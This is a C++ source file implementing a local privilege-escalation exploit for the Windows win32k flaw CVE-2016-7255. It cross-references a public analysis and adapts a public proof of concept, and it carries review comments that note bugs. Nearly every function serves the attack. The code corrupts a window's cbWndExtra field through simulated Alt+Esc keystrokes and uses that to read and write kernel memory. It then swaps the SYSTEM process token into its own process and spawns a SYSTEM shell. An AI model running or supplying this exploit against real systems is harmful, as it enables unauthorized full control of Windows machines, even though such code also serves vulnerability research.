//NOTE The 'Step' numbers in comments are cross references to http://blog.trendmicro.com/trendlabs-security-intelligence/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild/

#include "stdafx.h"
#include "types.h"
#include "CVE-2016-7255.h"

#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"Version.lib")

// Direct win32k system-call stubs; the caller passes the per-OS syscall number as the
// last argument. NOTE(review): their definitions are not in this file — presumably a
// separate assembly source; confirm.
extern "C" unsigned int NtUserGetAncestor(HWND hnd, unsigned int flag, unsigned int sysCallNumber);
extern "C" unsigned long long NtUserSetWindowLongPtr(HWND hnd, unsigned long long offset, unsigned long long value, unsigned int sysCallNumber);


// user32's unexported HMValidateHandle, resolved by FindHMValidateHandle().
lHMValidateHandle pHmValidateHandle = NULL;

// Offsets inside a window object, discovered at runtime by FindMemoryOffsets().
unsigned int cbWndExtraOffset = 0;
unsigned int ExtraMemoryOffset = 0;
// Offset of spwndParent used by ReadKenelMemory(). NOTE(review): hard-coded for all OS versions.
unsigned int spwndParentOffset = 0x058;

// Per-OS structure offsets and syscall numbers, set by DetectOSAndSetVerOffsets().
// They stay 0 when the detected version matches none of its branches.
unsigned int UniqueProcessIdOffset = 0;
unsigned int TokenOffset = 0;
unsigned int ActiveProcessLinks = 0;
unsigned int KProcessOffset = 0;
unsigned int NtUserSetWindowLongPtrSyscallNumber = 0;
unsigned int NtUserGetAncestorSyscallNumber = 0;

// Kernel addresses gathered by FindSecurityTokens(); NULL is used here as integer 0.
unsigned long long SystemSecurityTokenAddr = NULL;
unsigned long long MySecTokenAddr = NULL;
unsigned long long MyEPROCESSAddr = NULL;

// The two adjacent target windows chosen by CreateTargetWindows().
HWND primary = NULL;
HWND secondary = NULL;

// Entry point: runs each stage in the order of the referenced write-up.
// After the spawned shell exits, it restores the saved token pointer, writes an empty
// string to the corrupted cbWndExtra location, and destroys the two target windows.
// argc/argv are unused.
int __cdecl main(int argc, char** argv)
{
	//Step 3
	// Populate per-OS offsets and syscall numbers.
	DetectOSAndSetVerOffsets();

	//Step 4
	// NOTE(review): the BOOL result is ignored; on failure pHmValidateHandle stays NULL
	// and is called unconditionally below.
	FindHMValidateHandle();

	FindMemoryOffsets();

	//Step 6
	CreateTargetWindows();
	//Steps 7 and 8 are implemented in the ReadKenelMemory and WriteKernelMemory functions
	THRDESKHEAD *primaryTagWND = (THRDESKHEAD *)pHmValidateHandle(primary, 1);
	unsigned long long primaryKernelAddr = (unsigned long long) primaryTagWND->pSelf;
	// Kernel address of byte 3 of primary's cbWndExtra field.
	unsigned long long corruptionTarget = primaryKernelAddr + cbWndExtraOffset + 3;
	printf("Target cbWndExtra fields kernel memory address: 0x%llx, ready to go?\n", corruptionTarget);
	// Wait for the operator to press Enter before triggering the corruption.
	getchar();
	CorruptByte(corruptionTarget);
	printf("Primary Window cbWndExtra value corrupted!\n");

	//Step 9
	FindSecurityTokens();

	// Split the 64-bit SYSTEM token value into four 16-bit wide chars, low word first.
	// Element [4] stays 0 and terminates the string passed to WriteKernelMemory.
	wchar_t strSysSecToken[5] = { 0x00 };
	strSysSecToken[3] = (SystemSecurityTokenAddr >> 48) & 0xFFFF;
	strSysSecToken[2] = (SystemSecurityTokenAddr >> 32) & 0xFFFF;
	strSysSecToken[1] = (SystemSecurityTokenAddr >> 16) & 0xFFFF;
	strSysSecToken[0] = (SystemSecurityTokenAddr >> 0) & 0xFFFF;
	printf("Security token to steal: 0x%llx\n", SystemSecurityTokenAddr);
	//Step 9.4
	WriteKernelMemory(MyEPROCESSAddr + TokenOffset, strSysSecToken);
	
	printf("SYSTEM please.\n");
	// Blocks until the spawned shell exits.
	system("cmd.exe");

	// Encode the saved original token the same way and write it back.
	wchar_t strOrigSecToken[5] = { 0x00 };
	strOrigSecToken[3] = (MySecTokenAddr >> 48) & 0xFFFF;
	strOrigSecToken[2] = (MySecTokenAddr >> 32) & 0xFFFF;
	strOrigSecToken[1] = (MySecTokenAddr >> 16) & 0xFFFF;
	strOrigSecToken[0] = (MySecTokenAddr >> 0) & 0xFFFF;

	WriteKernelMemory(MyEPROCESSAddr + TokenOffset, strOrigSecToken);
	
	// Write an empty wide string at the corrupted location.
	// NOTE(review): presumably intended to clear the corrupted byte; confirm exactly
	// what SetWindowText stores for an empty string.
	wchar_t size[1] = { 0x00 };
	WriteKernelMemory(corruptionTarget, size);
	
	//Step 10
	DestroyWindow(primary);
	DestroyWindow(secondary);
	return 0;
}

void DetectOSAndSetVerOffsets() {

	printf("Finding OS version\n");
	void *baseInfo;
	unsigned long verInfoSize = GetFileVersionInfoSize(TEXT("kernel32.dll"), &verInfoSize);

	void *fileVersionInfo = new char[verInfoSize];
	GetFileVersionInfo(TEXT("kernel32.dll"), 0, verInfoSize, fileVersionInfo);
	unsigned int baseInfoSize = 0;
	VerQueryValue(fileVersionInfo, TEXT("\\"), &baseInfo, &baseInfoSize);

	VS_FIXEDFILEINFO *verInfo = (VS_FIXEDFILEINFO *)baseInfo;
	DWORD dwMajorVersionMsb = HIWORD(verInfo->dwFileVersionMS);
	DWORD dwMajorVersionLsb = LOWORD(verInfo->dwFileVersionMS);

	if (dwMajorVersionMsb == 6 && dwMajorVersionLsb == 1) {
		NtUserSetWindowLongPtrSyscallNumber = 0x133a;
		NtUserGetAncestorSyscallNumber = 0x10b2;
		UniqueProcessIdOffset = 0x180;
		TokenOffset = 0x208;
		ActiveProcessLinks = 0x188;
		KProcessOffset = 0x50;
		printf("Windows 7\n");
	}
	else if (dwMajorVersionMsb == 6 && dwMajorVersionLsb == 2) {
		NtUserSetWindowLongPtrSyscallNumber = 0x13d9;
		NtUserGetAncestorSyscallNumber = 0x10b2;
		UniqueProcessIdOffset = 0x2e0;
		TokenOffset = 0x348;
		ActiveProcessLinks = 0x2e8;
		KProcessOffset = 0x98;
		printf("Windows 8\n");
	}
	else if (dwMajorVersionMsb == 6 && dwMajorVersionLsb == 3) {
		NtUserSetWindowLongPtrSyscallNumber = 0x140d;
		NtUserGetAncestorSyscallNumber = 0x10B3;
		UniqueProcessIdOffset = 0x2e0;
		TokenOffset = 0x348;
		ActiveProcessLinks = 0x2e8;
		KProcessOffset = 0x98;
		printf("Windows 8.1\n");
	}
	else if (dwMajorVersionMsb == 10 && dwMajorVersionLsb == 0) {
		NtUserSetWindowLongPtrSyscallNumber = 0x146e;
		NtUserGetAncestorSyscallNumber = 0x10b4;
		UniqueProcessIdOffset = 0x2e8;
		TokenOffset = 0x358;
		ActiveProcessLinks = 0x2f0;
		KProcessOffset = 0x98;
		printf("Windows 10\n");
	}
}

// Locates user32's unexported HMValidateHandle and stores it in pHmValidateHandle.
// It scans the exported IsMenu for its first CALL opcode (0xE8) and derives the target
// from the 32-bit displacement that follows it.
// Returns TRUE on success, or FALSE if user32, IsMenu, or a 0xE8 byte within 0x1000
// bytes of IsMenu cannot be found.
BOOL FindHMValidateHandle() {
	HMODULE hUser32 = LoadLibraryA("user32.dll");
	if (hUser32 == NULL) {
		printf("Failed to load user32");
		return FALSE;
	}
	//Step 4.2
	BYTE* pIsMenu = (BYTE *)GetProcAddress(hUser32, "IsMenu");
	if (pIsMenu == NULL) {
		printf("Failed to find location of exported function 'IsMenu' within user32.dll\n");
		return FALSE;
	}
	// Offset (from IsMenu) of the displacement following the first 0xE8 byte.
	// 0 means "not found"; any match yields i + 1 >= 1, so the sentinel is unambiguous.
	unsigned int uiHMValidateHandleOffset = 0;
	for (unsigned int i = 0; i < 0x1000; i++) {
		BYTE* test = pIsMenu + i;
		if (*test == 0xE8) {
			uiHMValidateHandleOffset = i + 1;
			break;
		}
	}
	if (uiHMValidateHandleOffset == 0) {
		printf("Failed to find offset of HMValidateHandle from location of 'IsMenu'\n");
		return FALSE;
	}

	// The 32-bit displacement of the CALL.
	unsigned int addr = *(unsigned int *)(pIsMenu + uiHMValidateHandleOffset);
	// IsMenu's module-relative offset plus the displacement, in 32-bit arithmetic.
	// The (unsigned int) casts truncate the 64-bit pointers; the difference remains
	// correct only while IsMenu lies within 4 GiB of the module base.
	// NOTE(review): a CALL rel32 displacement is relative to the end of the instruction,
	// which this formula does not add. The empirical "+ 11" below therefore depends on
	// where the CALL sits inside IsMenu on the tested builds.
	unsigned int offset = ((unsigned int)pIsMenu - (unsigned int)hUser32) + addr;
	//The +11 is to skip the padding bytes as on Windows 10 these aren't nops
	//obviously a more elegant solution would be to scan memory for the true start...
	pHmValidateHandle = (lHMValidateHandle)((ULONG_PTR)hUser32 + offset + 11);
	return TRUE;
}

// Discovers two offsets inside the window object that pHmValidateHandle returns.
// That object is readable from user mode, since this function dereferences it.
//  - ExtraMemoryOffset: where a window's extra bytes begin. A marker (0x31323334) is
//    written with SetWindowLong(hwnd, 0, ...), then the object is scanned for it.
//  - cbWndExtraOffset: where the cbWndExtra size field lives. Two classes are
//    registered with cbWndExtra 0x118 and 0x130, and the first offset holding each
//    value in the respective window is taken.
// Each global keeps its previous value (0 at startup) if its scan finds no match.
// NOTE(review): the results of CreateWindowEx and pHmValidateHandle are not checked,
// and the window style 20 (0x14) is an unexplained magic number.
void FindMemoryOffsets() {
	//Step 4.1
	WNDCLASSEX wnd = { 0x0 };
	wnd.cbSize = sizeof(wnd);
	wnd.cbWndExtra = 0x10;
	wnd.lpszClassName = TEXT("ExtraMemOffset");
	wnd.lpfnWndProc = MainWProc;
	int result = RegisterClassEx(&wnd);
	if (!result)
	{
		printf("RegisterClassEx error: %d\r\n", GetLastError());
	}


	HWND extraMemFindWindow = CreateWindowEx(0, wnd.lpszClassName, NULL, 20, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);
	
	void * extraMemAddr = pHmValidateHandle(extraMemFindWindow, 1);
	
	// Plant a recognizable 32-bit marker at extra-bytes index 0.
	SetWindowLong(extraMemFindWindow, 0, 0x31323334);
	//Step 4.3
	// Byte-granular (unaligned) scan of the first 0x1000 bytes for the marker.
	for (unsigned int i = 0; i < 0x1000; i++) {
		unsigned long* data = (unsigned long*)((unsigned long long)extraMemAddr + i);
		if (*data == 0x31323334) {
			printf("Found extra memory offset: 0x%X\n", i);
			ExtraMemoryOffset = i;
			break;
		}
	}
	//Step 4.4
	DestroyWindow(extraMemFindWindow);

	//Step 4.5
	// Two classes whose only difference is cbWndExtra, so the field can be told
	// apart from coincidental matches.
	WNDCLASSEX wndCbHuntA = { 0x0 };
	wndCbHuntA.cbSize = sizeof(wndCbHuntA);
	wndCbHuntA.cbWndExtra = 0x118;
	wndCbHuntA.lpszClassName = TEXT("wndCbHuntA");
	wndCbHuntA.lpfnWndProc = MainWProc;
	result = RegisterClassEx(&wndCbHuntA);
	if (!result) {
		printf("RegisterClassEx error: %d\r\n", GetLastError());
	}

	WNDCLASSEX wndCbHuntB = { 0x0 };
	wndCbHuntB.cbSize = sizeof(wndCbHuntB);
	wndCbHuntB.cbWndExtra = 0x130;
	wndCbHuntB.lpszClassName = TEXT("wndCbHuntB");
	wndCbHuntB.lpfnWndProc = MainWProc;
	result = RegisterClassEx(&wndCbHuntB);
	if (!result) {
		printf("RegisterClassEx error: %d\r\n", GetLastError());
	}

	//Step 4.6
	HWND cbOffsetFindWindowA = CreateWindowEx(0, wndCbHuntA.lpszClassName, NULL, 20, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);
	HWND cbOffsetFindWindowB = CreateWindowEx(0, wndCbHuntB.lpszClassName, NULL, 20, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);

	//Step 4.7
	void *cbOffsetFindWindowAAddr = pHmValidateHandle(cbOffsetFindWindowA, 1);
	void *cbOffsetFindWindowBAddr = pHmValidateHandle(cbOffsetFindWindowB, 1);
	//Step 4.8
	// Accept the first offset where window A holds 0x118 and window B holds 0x130.
	for (unsigned int i = 0; i < 0x1000; i++) {
		unsigned short* data = (unsigned short*)((unsigned long long)cbOffsetFindWindowAAddr + i);
		if (*data == 0x118) {
			unsigned short* check = (unsigned short*)((unsigned long long)cbOffsetFindWindowBAddr + i);
			if (*check == 0x130) {
				printf("Found cbWndExtra offset: 0x%X\n", i);
				cbWndExtraOffset = i;
				break;
			}
		}
	}
	//Step 4.9
	DestroyWindow(cbOffsetFindWindowB);
	DestroyWindow(cbOffsetFindWindowA);
}

// Window procedure for the helper classes registered in this file. It handles no
// messages itself: every message is forwarded unchanged to DefWindowProc and that
// result is returned.
LRESULT CALLBACK MainWProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	const LRESULT defaultResult = DefWindowProc(hWnd, uMsg, wParam, lParam);
	return defaultResult;
}

// Creates 0x100 "MainWClass" windows and selects the first pair (in i, then j order)
// whose pSelf kernel addresses differ by less than 0x3fd00 bytes.
// The window at the lower address becomes `primary` and the higher one `secondary`.
// All other spare windows are destroyed, and secondary's text is set to "text".
// NOTE(review): if no pair qualifies, primary/secondary stay NULL and nothing here or
// in main checks for that.
void CreateTargetWindows() {
	//Step 6.1
	printf("Creating target primary and secondary windows\n");

	WNDCLASSEX wnd = { 0x0 };
	wnd.cbSize = sizeof(wnd);
	wnd.lpszClassName = TEXT("MainWClass");
	wnd.lpfnWndProc = MainWProc;
	int result = RegisterClassEx(&wnd);
	if (!result)
	{
		printf("\tRegisterClassEx error: %d\r\n", GetLastError());
	}

	HWND spares[0x100];
	for (unsigned int i = 0; i < 0x100; i++) {
		HWND spare = CreateWindowEx(0, wnd.lpszClassName, TEXT("WORDS"), 0, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);
		spares[i] = spare;
	}

	//Step 6.2
	// O(n^2) pairwise search; the inner break only ends the j loop, and the outer
	// loop stops once primary has been set.
	for (unsigned int i = 0; i < 0x100; i++) {
		
		THRDESKHEAD *hTagOne = (THRDESKHEAD *)pHmValidateHandle(spares[i], 1);
		unsigned long long hTagOneAddr = (unsigned long long) hTagOne->pSelf;

		for (unsigned int j = 0; j < 0x100; j++) {
			if (i != j) {
				THRDESKHEAD *hTagTwo = (THRDESKHEAD *)pHmValidateHandle(spares[j], 1);
				unsigned long long hTagTwoAddr = (unsigned long long) hTagTwo->pSelf;
				if (hTagOneAddr > hTagTwoAddr) {
					unsigned long long diff = hTagOneAddr - hTagTwoAddr;
					if (diff < 0x3fd00) {
						printf("\tPrimary hTagWnd address: 0x%llx\n", hTagTwoAddr);
						printf("\tSecondary hTagWnd address: 0x%llx\n", hTagOneAddr);
						primary = spares[j];
						secondary = spares[i];
						break;
					}
				}
				else {
					unsigned long long diff = hTagTwoAddr - hTagOneAddr;
					if (diff < 0x3fd00) {
						printf("\tPrimary hTagWnd address: 0x%llx\n", hTagOneAddr);
						printf("\tSecondary hTagWnd address: 0x%llx\n", hTagTwoAddr);
						primary = spares[i];
						secondary = spares[j];
						break;
					}
				}
			}

		}
		if (primary != NULL) {
			printf("\tTargets found!\n");
			break;
		}
	}
	// NOTE(review): HWND is printed with %llx (%p would match the pointer type), and
	// the first message misspells "HWND".
	printf("\tHWDN primary = 0x%llx\n", primary);
	printf("\tHWND secondary = 0x%llx\n", secondary);
	//Step 6.3
	for (unsigned int i = 0; i < 0x100; i++) {
		HWND tmp = spares[i];
		if (tmp != primary && tmp != secondary) {
			DestroyWindow(tmp);
		}
	}
	printf("\tSpare windows destroyed\n");
	// NOTE(review): presumably gives secondary a text buffer whose pointer
	// WriteKernelMemory later saves and restores; confirm.
	SetWindowText(secondary, TEXT("text"));
}

//Step 7
// Reads a 32-bit value through kernel address `addr` (the misspelled name is what callers use).
// Steps:
//  1. Call NtUserSetWindowLongPtr on `primary` with an index equal to the distance from
//     primary's extra memory to secondary's spwndParent field, storing `addr` there.
//  2. Call NtUserGetAncestor(secondary, GA_PARENT); its unsigned int result is returned.
//  3. Write `orig` back through the same index.
// NOTE(review): this presumably only works after CorruptByte() has enlarged primary's
// cbWndExtra (inferred from main's call order); confirm. Which 32 bits GetAncestor
// yields for the forged parent is presumably the value at `addr`, as
// ReadPtrFromKernelMemory assumes.
unsigned int ReadKenelMemory(unsigned long long addr) {
	THRDESKHEAD *hTagOne = (THRDESKHEAD *)pHmValidateHandle(primary, 1);
	THRDESKHEAD *hTagTwo = (THRDESKHEAD *)pHmValidateHandle(secondary, 1);
	//Step 7.1
	// NOTE(review): because of the cast to unsigned long long*, "+ spwndParentOffset" advances
	// by spwndParentOffset * 8 bytes (0x2c0), not 0x58 bytes. `orig` is therefore not read
	// from the field that is overwritten and later "restored" below.
	unsigned long long orig = *((unsigned long long*)pHmValidateHandle(secondary, 1) + spwndParentOffset);
	unsigned long long spwndParentAddr = (unsigned long long)hTagTwo->pSelf + spwndParentOffset;
	unsigned long long extraMemAddr = (unsigned long long) hTagOne->pSelf + ExtraMemoryOffset;
	//Step 7.2
	// Index into primary's extra bytes that lands on secondary's spwndParent.
	unsigned long long distance = spwndParentAddr - extraMemAddr;
	SetLastError(0);
	//Step 7.3
	unsigned long long prev = NtUserSetWindowLongPtr(primary, distance, addr, NtUserSetWindowLongPtrSyscallNumber);
	// A 0 return is only an error if the last-error value was set.
	if (prev == 0 && GetLastError() != 0) {
		printf("NtUSerSetWIndowLongPtr failed with 0x%X, 0x%llx, 0x%llx and error: 0x%X", primary, distance, addr, GetLastError());
	}
	//Step 7.4
	unsigned int read = NtUserGetAncestor(secondary, GA_PARENT, NtUserGetAncestorSyscallNumber);
	//Step 7.5
	NtUserSetWindowLongPtr(primary, distance, orig, NtUserSetWindowLongPtrSyscallNumber);
	return read;
}

// Reads a 64-bit little-endian value at kernel address `addr` as two 32-bit reads.
// The low half at `addr` is read first, then the high half at `addr + 4`.
unsigned long long ReadPtrFromKernelMemory(unsigned long long addr) {
	const unsigned long long lowHalf = ReadKenelMemory(addr);
	const unsigned long long highHalf = ReadKenelMemory(addr + 4);
	// lowHalf fits in 32 bits, so OR-ing is the same as adding.
	return (highHalf << 32) | lowHalf;
}

//Step 8
// Writes the NUL-terminated wide string `content` to kernel address `addr`.
// Steps:
//  1. Save the buffer pointer of the LARGE_UNICODE_STRING at offset 0xd8 of
//     secondary's user-mode object view.
//  2. Use NtUserSetWindowLongPtr on `primary` to store `addr` at
//     secondary.pSelf + cbWndExtraOffset - 8.
//  3. Call SetWindowText(secondary, content).
//  4. Write the saved pointer back.
// NOTE(review): this presumes that offset 0xd8 + Buffer and cbWndExtraOffset - 8 refer
// to the same field (the window-name buffer pointer) on the targeted builds; confirm.
void WriteKernelMemory(unsigned long long addr, LPWSTR content) {
	THRDESKHEAD *hTagOne = (THRDESKHEAD *)pHmValidateHandle(primary, 1);
	THRDESKHEAD *hTagTwo = (THRDESKHEAD *)pHmValidateHandle(secondary, 1);
	//Step 8.1
	LARGE_UNICODE_STRING* bufferOriginalAddr = (LARGE_UNICODE_STRING*)((unsigned long long)pHmValidateHandle(secondary, 1) + 0xd8);
	PWSTR contents = bufferOriginalAddr->Buffer;
	//Step 8.2
	unsigned long long extraMemAddr = (unsigned long long) hTagOne->pSelf + ExtraMemoryOffset;
	unsigned long long bufferAddr = (unsigned long long) hTagTwo->pSelf + (cbWndExtraOffset - 8);
	// Index into primary's extra bytes that lands on the target pointer in secondary.
	unsigned long long diff = bufferAddr - extraMemAddr;
	//Step 8.3
	NtUserSetWindowLongPtr(primary, diff, addr, NtUserSetWindowLongPtrSyscallNumber);
	//Step 8.4
	SetWindowText(secondary, content);
	//Step 8.5
	NtUserSetWindowLongPtr(primary, diff, (unsigned long long)contents, NtUserSetWindowLongPtrSyscallNumber);
}

//Step 9
// Walks kernel structures with ReadPtrFromKernelMemory/ReadKenelMemory and fills three globals:
//  - MyEPROCESSAddr: reached as primary's pti -> [pti] -> [+KProcessOffset] -> [+0x20].
//    NOTE(review): the intermediate names (tagTHREAD, kapc_state) follow the printed
//    labels; confirm against the structure layouts.
//  - MySecTokenAddr: the value at MyEPROCESSAddr + TokenOffset.
//  - SystemSecurityTokenAddr: the value at TokenOffset in the first process, reached by
//    following ActiveProcessLinks, whose 32-bit UniqueProcessId reads as 4.
// NOTE(review): the process right after this one is read and printed but never compared
// with 4. The while(true) loop has no exit other than finding pid 4.
void FindSecurityTokens() {
	printf("Looking for current processes security token and SYSTEM security token\n");
	//Step 9.1
	THRDESKHEAD *primaryTagWND = (THRDESKHEAD *)pHmValidateHandle(primary, 1);
	unsigned long long pti = (unsigned long long)primaryTagWND->h.pti;
	printf("\tSearching for current processes EPROCESS structure\n");
	
	unsigned long long threadTagPointer = ReadPtrFromKernelMemory(pti);
	printf("\ttagTHREAD == %llx\n", threadTagPointer);
	
	unsigned long long kapcStateAddr = ReadPtrFromKernelMemory(threadTagPointer + KProcessOffset);
	printf("\tkapc_stateAddr == %llx\n", kapcStateAddr);
	
	MyEPROCESSAddr = ReadPtrFromKernelMemory(kapcStateAddr + 0x20);
	
	printf("\teprocess == %llx\n", MyEPROCESSAddr);
	
	MySecTokenAddr = ReadPtrFromKernelMemory(MyEPROCESSAddr + TokenOffset);
	printf("\tOriginal security token pointer: 0x%llx\n", MySecTokenAddr);
	
	printf("Searching for SYSTEM security token address\n");

	// The list entry points at the next process's ActiveProcessLinks field, so
	// subtract the field offset to get that process's base address.
	unsigned long long nextProc = ReadPtrFromKernelMemory(MyEPROCESSAddr + ActiveProcessLinks) - ActiveProcessLinks;
	printf("\tNext eprocess address: 0x%llx\n", nextProc);
	
	unsigned int pid = ReadKenelMemory(nextProc + UniqueProcessIdOffset);
	printf("\tFound pid: 0x%X\n", pid);
	
	while (true) {
		nextProc = ReadPtrFromKernelMemory(nextProc + ActiveProcessLinks) - ActiveProcessLinks;
		printf("\tNext eprocess address: 0x%llx\n", nextProc);

		pid = ReadKenelMemory(nextProc + UniqueProcessIdOffset);
		printf("\tFound pid: 0x%X\n", pid);
		//Step 9.2
		if (pid == 4) {
			printf("\ttarget process found!\n");
			SystemSecurityTokenAddr = ReadPtrFromKernelMemory(nextProc + TokenOffset);
			break;
		}
	}
}

//Everything after this point is adapted from @TinySecEx's PoC for the issue: https://github.com/tinysec/public/tree/master/CVE-2016-7255
// Triggers the CVE-2016-7255 corruption at kernel address `addr`.
// Steps:
//  1. Create a visible parent window and a WS_CHILD window of class "cve-2016-7255".
//  2. Set the child's GWLP_ID to addr - 0x28.
//  3. Reparent the child to the desktop window.
//  4. Inject Alt+Shift+Tab, Alt+Shift+Esc and repeated Alt+Esc key sequences while
//     pumping up to 20 messages.
// Both windows are destroyed at the end. Returns silently if either window cannot be
// created.
// NOTE(review): which bits change at `addr` is determined by the kernel bug, not by
// this code.
void CorruptByte(unsigned long long addr) {
	//Step 6.4
	WNDCLASSEXW wndClass = { 0 };

	wndClass.cbSize = sizeof(wndClass);
	wndClass.lpfnWndProc = DefWindowProcW;
	// NOTE(review): TEXT() yields a wide string only in UNICODE builds, which the
	// WNDCLASSEXW member requires.
	wndClass.lpszClassName = TEXT("cve-2016-7255");

	// NOTE(review): RegisterClassExW returns an ATOM (unsigned 16-bit). SUCCEEDED() tests
	// (HRESULT)x >= 0, which is always true for an ATOM, so this early return never
	// happens, even when registration fails and returns 0.
	if (!SUCCEEDED(RegisterClassExW(&wndClass))) {
		return;
	}

	HWND parent = CreateWindowEx(0, wndClass.lpszClassName, NULL, WS_OVERLAPPEDWINDOW | WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);

	if (parent == NULL) {
		return;
	}

	HWND child = CreateWindowEx(0, wndClass.lpszClassName, TEXT("child"), WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, parent, NULL, NULL, NULL);

	if (child == NULL) {
		return;
	}

	//Step 6.5 + 6.6
	// The child's ID is set to an address 0x28 bytes below the target.
	SetWindowLongPtr(child, GWLP_ID, addr - 0x28);

	//Step 6.7
	ShowWindow(parent, SW_SHOWNORMAL);

	SetParent(child, GetDesktopWindow());

	SetForegroundWindow(child);

	SendAltShiftTab(4);

	SwitchToThisWindow(child, TRUE);

	SendAltShiftEsc();
	int i = 0;
	MSG stMsg = { 0 };
	// NOTE(review): GetMessage is evaluated before the i < 20 check. On the 21st check it
	// still blocks for, and then discards, one more message.
	while (GetMessage(&stMsg, NULL, 0, 0) && i < 20) {

		SetFocus(parent);
		SendAltEsc(20);
		SetFocus(child);
		SendAltEsc(20);

		TranslateMessage(&stMsg);
		DispatchMessage(&stMsg);
		i++;
	}

	DestroyWindow(parent);
	DestroyWindow(child);

}

void KeyAction(unsigned short key, unsigned int dir) {
	INPUT stInput = { 0 };

	stInput.type = INPUT_KEYBOARD;
	stInput.ki.wVk = key;
	stInput.ki.dwFlags = dir;

	SendInput(1, &stInput, sizeof(stInput));
}

// Sends a complete keystroke for `key`: a DOWN event, then an UP event.
void KeyPress(unsigned short key) {
	for (int released = 0; released < 2; ++released) {
		KeyAction(key, released ? UP : DOWN);
	}
}

// Presses Alt then Shift, taps Escape twice, then releases Alt then Shift.
void SendAltShiftEsc()
{
	static const unsigned short kModifiers[2] = { VK_MENU, VK_SHIFT };

	for (unsigned int m = 0; m < 2; ++m) {
		KeyAction(kModifiers[m], DOWN);
	}

	for (unsigned int tap = 0; tap < 2; ++tap) {
		KeyPress(VK_ESCAPE);
	}

	for (unsigned int m = 0; m < 2; ++m) {
		KeyAction(kModifiers[m], UP);
	}
}

// Presses Alt then Shift, taps Tab `count` times (sleeping 1000 ms after each tap),
// then releases Alt then Shift.
void SendAltShiftTab(unsigned int count)
{
	static const unsigned short kModifiers[2] = { VK_MENU, VK_SHIFT };

	for (unsigned int m = 0; m < 2; ++m) {
		KeyAction(kModifiers[m], DOWN);
	}

	for (unsigned int remaining = count; remaining != 0; --remaining) {
		KeyPress(VK_TAB);
		Sleep(1000);
	}

	for (unsigned int m = 0; m < 2; ++m) {
		KeyAction(kModifiers[m], UP);
	}
}

// Repeats the Alt+Esc sequence `count` times.
// Each repetition presses Alt, taps Escape twice, and releases Alt.
void SendAltEsc(unsigned int count)
{
	unsigned int remaining = count;
	while (remaining-- > 0) {
		KeyAction(VK_MENU, DOWN);
		KeyPress(VK_ESCAPE);
		KeyPress(VK_ESCAPE);
		KeyAction(VK_MENU, UP);
	}
}